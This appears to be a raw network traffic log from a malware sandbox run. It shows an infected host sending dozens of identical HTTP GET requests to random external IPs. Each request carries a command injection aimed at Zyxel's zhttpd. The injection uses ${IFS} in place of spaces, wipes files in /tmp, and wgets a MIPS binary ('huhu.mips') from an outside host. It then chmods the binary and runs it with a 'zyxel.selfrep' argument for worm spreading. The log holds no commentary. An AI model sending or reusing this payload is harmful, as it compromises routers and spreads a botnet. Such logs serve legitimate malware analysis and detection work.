                                                      Feb 2, 2024 06:35:45.467734098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2524192.168.2.1454264195.231.130.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467780113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2525192.168.2.1454344189.68.153.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467818975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2526192.168.2.1460154122.0.161.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467854023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2527192.168.2.145195042.164.104.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467900991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2528192.168.2.143363688.114.17.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467932940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2529192.168.2.145686843.29.24.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.467971087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2530192.168.2.143946088.33.46.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468010902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2531192.168.2.1443210199.44.189.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468041897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2532192.168.2.1456594199.87.62.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468094110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2533192.168.2.145400263.140.152.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468153000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2534192.168.2.1443006116.237.108.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468180895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2535192.168.2.144575681.156.4.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468229055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2536192.168.2.1442790139.145.20.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468282938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2537192.168.2.1459086134.171.2.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468316078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2538192.168.2.1434278208.248.39.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468358040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2539192.168.2.1437254207.84.202.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468394995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2540192.168.2.1445736106.165.204.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468440056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2541192.168.2.1450130160.102.35.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468471050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2542192.168.2.1457718120.176.0.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468517065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2543192.168.2.1451254194.89.21.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468542099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2544192.168.2.144164691.66.208.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468570948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2545192.168.2.144317647.164.124.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468626976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2546192.168.2.145785867.181.65.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468657017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2547192.168.2.144515243.48.31.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468719959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2548192.168.2.1450442185.8.31.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468753099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2549192.168.2.1459452177.119.164.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468760967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2550192.168.2.1450186129.49.33.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468808889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2551192.168.2.143860834.147.241.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468844891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2552192.168.2.144936057.16.77.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468893051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2553192.168.2.1455570115.4.109.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468909025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2554192.168.2.1457712197.24.247.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468959093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2555192.168.2.14443264.46.67.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.468986034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2556192.168.2.1444290190.229.59.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469028950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2557192.168.2.143977065.30.253.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469058037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2558192.168.2.146095660.99.141.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469110012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2559192.168.2.145033217.99.119.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469155073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2560192.168.2.1453268150.7.107.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469175100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2561192.168.2.146079871.231.250.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469233036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2562192.168.2.1434130177.100.57.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469278097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2563192.168.2.145516413.132.91.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469326019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2564192.168.2.1451934157.238.238.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469363928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2565192.168.2.1457916158.95.70.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469398975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2566192.168.2.1459418136.245.65.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469446898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2567192.168.2.145921442.232.174.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469490051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2568192.168.2.1456138217.208.183.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469530106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2569192.168.2.146018241.63.224.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469567060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2570192.168.2.1445784115.177.106.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469620943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2571192.168.2.1445712136.251.54.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469660044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2572192.168.2.1460668155.224.94.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469681978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2573192.168.2.1437618152.221.5.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469719887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2574192.168.2.143420875.209.134.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469777107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2575192.168.2.1441870139.23.199.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469819069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2576192.168.2.143945069.19.44.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469854116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2577192.168.2.1435882158.64.128.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469899893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2578192.168.2.143412239.168.80.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469942093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2579192.168.2.1437642148.241.215.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.469999075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2580192.168.2.14463701.215.240.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470036030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2581192.168.2.145296891.100.183.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470076084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2582192.168.2.145215238.181.63.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470118999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2583192.168.2.145106899.39.27.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470165968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2584192.168.2.1441158171.169.238.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470201969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2585192.168.2.1447644174.33.39.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.470242977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2586192.168.2.1458476116.226.119.180443
                                                      TimestampBytes transferredDirectionData
